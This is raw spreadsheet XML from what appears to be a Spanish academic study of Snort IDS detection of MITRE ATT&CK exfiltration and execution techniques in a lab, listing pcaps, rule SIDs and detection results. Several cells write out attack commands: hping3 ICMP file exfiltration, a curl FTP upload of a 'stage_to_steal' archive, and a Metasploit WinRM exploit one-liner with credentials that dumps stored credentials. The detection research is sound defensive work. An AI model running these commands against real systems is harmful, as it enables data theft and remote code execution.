      <t>31767,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,384,408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100384,2002752,2002749,2100408,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,384,408,31767</t>
    </r>
  </si>
  <si>
    <t>2100384, 2002752, 2002749, 2100408</t>
  </si>
  <si>
    <t>Regla genérica que detecte PING inusual.</t>
  </si>
  <si>
    <t>Exfiltracion mediante protocolo ICMP. Envia varios echo Request que contienen como datos el contenido de ese fichero. Comando: echo "Esto es un exfiltración sobre ICMP" &gt; file;timeout 15s hping3 --file ./file --data 36 192.168.2.2 --icmp</t>
  </si>
  <si>
    <t>Exfiltración por FTP</t>
  </si>
  <si>
    <t>Caldera</t>
  </si>
  <si>
    <t>T1048.003-exfiltration_over_FTP.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,2100472,2006409,2043217</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2003303,2003410</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2015016,50447</t>
    </r>
  </si>
  <si>
    <t>Exfiltracion de datos utilizando el protocolo FTP. Utilizando caldera y la operacion Advanced Thief. Comando: curl -T stage_to_steal.tar.gz.gpg ftp://172.16.1.2/VictimDirectory/ --user "dit:dit"</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t xml:space="preserve"> T1011.001</t>
  </si>
  <si>
    <t>Extracción via Bluetooth</t>
  </si>
  <si>
    <t>Covenant, btobex, Bluetooth</t>
  </si>
  <si>
    <t>T1011_exfiltration-over-bluetooth.pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías en red Bluetooth. Envío y/o recepción de información comprometida por la red Bluetooth</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Traffic Duplication</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>Ejecución de script en Python para activar el reenvío de paquetes en el equipo víctima</t>
  </si>
  <si>
    <t>SSH, Scapy</t>
  </si>
  <si>
    <t>T1020.001_automated-exfiltration-traffic-duplication.pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías en red que detecte el envío duplicado de paquetes procedentes de un mismo origen interno a la organización</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>Comunicación C2 para el establecimiento de extracción programada</t>
  </si>
  <si>
    <t>Covenant, Powershell</t>
  </si>
  <si>
    <t>T1029_scheduled-transfer.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002752, 2002749, 2101917</t>
    </r>
  </si>
  <si>
    <t>Detección por anomalías, basada en el descubrimiento de eventos programados que no han sido creados por el usuario.</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>Dividir archivos para realizar transferencias menores a un umbral que provoque alertas</t>
  </si>
  <si>
    <t>ftp, split</t>
  </si>
  <si>
    <t>T1030.pcapng</t>
  </si>
  <si>
    <t>Dependiendo la forma en la que se envien los archivos, puede ser indetectable. Sin embargo, si utiliza protocolos de transferencia de ficheros (FTP,SMB...) resulta importante monitorizar transferencias con un mismo tamaño de manera concurrente</t>
  </si>
  <si>
    <t>Transferencia de ficheros mediante FTP, previamente divididos en paquetes de un tamaño constante</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transferir archivos de una cuenta a otra mediante un servicio en la nube</t>
  </si>
  <si>
    <t>OneDrive</t>
  </si>
  <si>
    <t>T1537.pcapng</t>
  </si>
  <si>
    <t>Deteccion por listas negras/anomalías</t>
  </si>
  <si>
    <t>Transferir entre dos cuentas en la nube unos ficheros</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Exfiltración por canal C2</t>
  </si>
  <si>
    <t>T1041.pcapng</t>
  </si>
  <si>
    <t>2043217,2034567,2013028,2016992</t>
  </si>
  <si>
    <t>50447, 2043217, 2034567, 2013028, 2016992</t>
  </si>
  <si>
    <t>2002752, 2002749, 2006409, 2043217, 2034567, 2013028, 2016992, 2002824, 50447</t>
  </si>
  <si>
    <t>Detección por anomalías basada en la sospecha de una extracción de información confidencial por un posible canal C2</t>
  </si>
  <si>
    <t>Exfiltration over Web Service</t>
  </si>
  <si>
    <t>T1567</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>Exfiltrar datos de un equipo a la nube</t>
  </si>
  <si>
    <t>Google Drive</t>
  </si>
  <si>
    <t>T1567.002.pcapng</t>
  </si>
  <si>
    <t>Transferir ficheros de un equipo a la nube</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>Malicious Link</t>
  </si>
  <si>
    <t>T1204.001</t>
  </si>
  <si>
    <t>Enlace malicioso</t>
  </si>
  <si>
    <t>wget</t>
  </si>
  <si>
    <t>T1204.001.pcapng</t>
  </si>
  <si>
    <t>Redireccion al pinchar en un enlace a un sitio malicioso. Comando : wget http://172.16.1.2 (Desde la víctima)</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Ejecución de carga por WinRM</t>
  </si>
  <si>
    <t>T1047.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1394</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 20619</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1394</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,20619</t>
    </r>
  </si>
  <si>
    <t>Regla genérica que detecte intento de ejecucion de código shell en un equipo</t>
  </si>
  <si>
    <t>Ejecucion de payload en un equipo mediante WinRM. Comando: msfconsole -x "use exploit/windows/winrm/winrm_script_exec; set RHOSTS 192.168.2.2; set LHOST 192.168.1.3; set LPORT 5555; set username administrator; set password vagrant; set force_vbs true; run -z; sessions -c 'cmdkey /list'; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>Ataque con Botnet</t>
  </si>
  <si>
    <t>T1203-C2018.pcapng</t>
  </si>
  <si>
    <t>System Services</t>
  </si>
  <si>
    <t>T1569</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>Ejecución de un Servicio / Fichero Ejecutable de manera remota</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>T1569_system-services-service-execution.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>30281</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 26385</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">. 44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>30281</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 26385, 2101620, 2100459, 2044666, 2051116, 2024510, 2002752, 2002749, 2027191</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Existen múltiples métodos de detección. Como ejemplos:
        Regla que detecte la cadena “PSEXESVC” en el contenido de mensajes SMBv2
        Regla que detecte archivos ejecutables en mensajes SMB
</t>
  </si>
  <si>
    <t>LEYENDA DETECTABILIDAD POR PATRONES</t>
  </si>
  <si>
    <t>LEYENDA PROCEDENCIA DE PCAPS (Manual [n])</t>
  </si>
  <si>
    <t>LEYENDA SIDs (TP y FP)</t>
  </si>
  <si>
    <t>LEYENDA ATAQUES COLATERALES</t>
  </si>
  <si>
    <t>n</t>
  </si>
  <si>
    <t>False Positive ■</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">True Positive Previo </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FF6AA84F"/>
      </rPr>
      <t>■</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">True Positive </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FFFF0000"/>
      </rPr>
      <t>■</t>
    </r>
  </si>
  <si>
    <t>SI [1]</t>
  </si>
  <si>
    <t>No, salvo uso de reglas personalizadas</t>
  </si>
  <si>
    <t>No, salvo circunstancias concretas del ataque</t>
  </si>
  <si>
    <t>No, salvo uso de reglas personalizadas y circunstancias concretas del ataque</t>
  </si>
  <si>
    <t>TFG en el que se encuentra documentado el proceso</t>
  </si>
  <si>
    <t>Seguridad en conmutadores de red y puntos de acceso. Clasificación y realización práctica de ataques</t>
  </si>
  <si>
    <t>Análisis de la capacidad de detección de ataques en red del IDS Snort bajo la matriz MITRE ATT&amp;CK mediante Caldera</t>
  </si>
  <si>
    <t>Detección en fase temprana de ciberataques con rastro en red</t>
  </si>
  <si>
    <t>Análisis de la capacidad de detección de ataques en red mediante los IDS Snort y FortiGate</t>
  </si>
  <si>
    <t>Análisis de la capacidad de detección de ataques en red mediante los IDS Snort y PaloAlto</t>
  </si>
  <si>
    <t>SID no relacionado con el ataque, evento de red, o legítimo, alerta no válida</t>
  </si>
  <si>
    <t>SID relacionado con la parte previa del ataque, no se contabiliza como alerta válida</t>
  </si>
  <si>
    <t>SID relacionado con el ataque, alerta válida</t>
  </si>
  <si>
    <t>En determinadas técnicas, debido a la necesidad de que los flujos se encuentren completos para el análisis con otros cortafuegos como FortiGate o PaloAlto, el establecimiento de conexión no puede omitirse, lo que causa que Snort genere alertas para fases que no constituyen el ataque como tal</t>
  </si>
  <si>
    <t>Fichero pcap</t>
  </si>
  <si>
    <t>Tipo de tráfico</t>
  </si>
  <si>
    <t>Categoría</t>
  </si>
  <si>
    <t>Tamaño real del tráfico</t>
  </si>
  <si>
    <t>SIDs en Tráfico legítimo</t>
  </si>
  <si>
    <t>#SIDs en Tráfico legítimo</t>
  </si>
  <si>
    <t>Contiene Flujos Truncados (Sin SYN)</t>
  </si>
  <si>
    <t>smtp-FIX.pcapng</t>
  </si>
  <si>
    <t>REAL</t>
  </si>
  <si>
    <t>Básico</t>
  </si>
  <si>
    <t>1,9 kB</t>
  </si>
  <si>
    <t>2002749</t>
  </si>
  <si>
    <t>http-FIX.pcapng</t>
  </si>
  <si>
    <t>52,7 kB</t>
  </si>
  <si>
    <t>2002749,2002752,2101620</t>
  </si>
  <si>
    <t>youtube-FIX.pcapng</t>
  </si>
  <si>
    <t>332,7 kB</t>
  </si>
  <si>
    <t>2002749,2002752,2101620,51037</t>
  </si>
  <si>
    <t>01 - DIT (01 - DIT (captura_00001_20240125083640)).pcapng</t>
  </si>
  <si>
    <t>TD</t>
  </si>
  <si>
    <t>100 MB</t>
  </si>
  <si>
    <t>2001219, 2002910, 2002911, 2003068, 2008120, 2010935, 2010937, 2019102, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2001219, 2002749, 2002752, 2002910, 2002911, 2003068, 2008120, 2009207, 2010935, 2010937, 2019102, 2100381, 2100384, 2100385, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2100615, 2100650, 2101384, 2101390, 2101411, 2101417, 2101444, 2101917</t>
  </si>
  <si>
    <t>02 - DIT (02 - DIT (captura_00001_20240202080842)).pcapng</t>
  </si>
  <si>
    <t>3,9 MB</t>
  </si>
  <si>
    <t>2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2100381, 2100384, 2100399, 2100402, 2100408, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>03 - DIT (03 - DIT (captura_00002_20240125191218)).pcapng</t>
  </si>
  <si>
    <t>103 MB</t>
  </si>
  <si>
    <t>2019102, 2100366, 2100476, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2009582, 2019102, 2100366, 2100381, 2100384, 2100385, 2100399, 2100402, 2100408, 2100469, 2100472, 2100476, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>04 - DIT (04 - DIT (captura_00003_20240126181602)).pcapng</t>
  </si>
  <si>
    <t>109 MB</t>
  </si>
  <si>
    <t>2019102, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2009582, 2019102, 2100381, 2100382, 2100384, 2100385, 2100399, 2100402, 2100404, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>05 - DIT (05 - DIT (captura_00004_20240128151951)).pcapng</t>
  </si>
  <si>
    <t>107 MB</t>
  </si>
  <si>
    <t>2019102, 2027397, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2009582, 2019102, 2027397, 2036751, 2100381, 2100384, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>06 - DIT (06 - DIT (captura_00005_20240130061546)).pcapng</t>
  </si>
  <si>
    <t>106 MB</t>
  </si>
  <si>
    <t>2009967, 2019102, 2027397, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2008470, 2009205, 2009206, 2009207, 2009208, 2009582, 2009967, 2019102, 2027397, 2100381, 2100384, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>07 - DIT (07 - DIT (captura_00006_20240131165021)).pcapng</t>
  </si>
  <si>
    <t>48 MB</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2008470, 2009206, 2009207, 2009208, 2019102, 2027397, 2100381, 2100384, 2100385, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>TOTAL</t>
  </si>
  <si>
    <t>2001219,2002910,2002911,2003068,2008120,2010935,2010937,2019102,2101384,2101411,2100366,2100476,2027397,2009967</t>
  </si>
  <si>
    <t>51037,2001219,2002910,2002911,2003068,2008120,2010935,2010937,2019102,2101384,2101411,2100366,2100476,2027397,2009967</t>
  </si>
  <si>
    <t>2002749,2002752,2101620,51037,2001117,2001219,2002910,2002911,2003068,2008120,2009207,2010935,2010937,2019102,2100381,2100384,2100385,2100399,2100402,2100408,2100469,2100472,2100527,2100615,2100650,2101384,2101390,2101411,2101417,2101444,2101917,2009582,2100366,2100476,2100382,2100404,2036751,2008470,2009205,2009206,2009208,2009967,2027397</t>
  </si>
  <si>
    <t>Paquetes Reglas (Nº único de reglas)</t>
  </si>
  <si>
    <t>Técnicas detectadas</t>
  </si>
  <si>
    <t>Ataques detectados</t>
  </si>
  <si>
    <t>Alertas totales (SIDs)</t>
  </si>
  <si>
    <t>Alertas promedio (SIDs) por ataque</t>
  </si>
  <si>
    <t>Community</t>
  </si>
  <si>
    <t>Táctica</t>
  </si>
  <si>
    <t>TOTAL TÉCNICAS</t>
  </si>
  <si>
    <t>TOTAL ATAQUES</t>
  </si>
  <si>
    <t>TOTAL SIDS</t>
  </si>
  <si>
    <t>TOTAL DETECTADAS</t>
  </si>
  <si>
    <t>TOTAL DETECTADOS</t>
  </si>
  <si>
    <t>TOTAL ALERTAS</t>
  </si>
  <si>
    <t>TOTAL NO DETECTADAS</t>
  </si>
  <si>
    <t>TOTAL NO DETECTADOS</t>
  </si>
  <si>
    <t>PORCENTAJE RESPECTO A TOTAL</t>
  </si>
  <si>
    <t>PORCENTAJE DETECTADAS</t>
  </si>
  <si>
    <t>PORCENTAJE DETECTADOS</t>
  </si>
  <si>
    <t>PORCENTAJE NO DETECTADAS</t>
  </si>
  <si>
    <t>PORCENTAJE NO DETECTADOS</t>
  </si>
  <si>
    <t>TP totales (SIDs)</t>
  </si>
  <si>
    <t>Efectividad SIDs (Nº de TP / Alertas totales)</t>
  </si>
  <si>
    <t>TOTAL TP</t>
  </si>
  <si>
    <t xml:space="preserve">PORCENTAJE TP RESPECTO A TOTAL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</si>
</sst>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9">
    <font>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="&quot;Google Sans&quot;"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font/>
    <font>
      <b/>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="13.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF6AA84F"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="13.0"/>
      <color theme="1"/>
      <name val="Fugaz One"/>
    </font>
    <font>
      <sz val="13.0"/>
      <color theme="1"/>
      <name val="Fugaz One"/>
    </font>
    <font>
      <strike/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
  </fonts>
  <fills count="14">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="lightGray"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFF2CC"/>
        <bgColor rgb="FFFFF2CC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFE599"/>
        <bgColor rgb="FFFFE599"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFD966"/>
        <bgColor rgb="FFFFD966"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF1C232"/>
        <bgColor rgb="FFF1C232"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE6E6E6"/>
        <bgColor rgb="FFE6E6E6"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDAF1F3"/>
        <bgColor rgb="FFDAF1F3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9D9D9"/>
        <bgColor rgb="FFD9D9D9"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFCCCCCC"/>
        <bgColor rgb="FFCCCCCC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF3F3F3"/>
        <bgColor rgb="FFF3F3F3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEFEFEF"/>
        <bgColor rgb="FFEFEFEF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF6D01"/>
        <bgColor rgb="FFFF6D01"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9E7FD"/>
        <bgColor rgb="FFD9E7FD"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="1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1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="4" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="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2" numFmtId="164" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="5" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="5" fontId="1" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="6" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="2" numFmtId="164" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="7" fillId="2" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="7" fillId="3" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="7" fillId="4" fontId="1" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="8" fillId="5" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
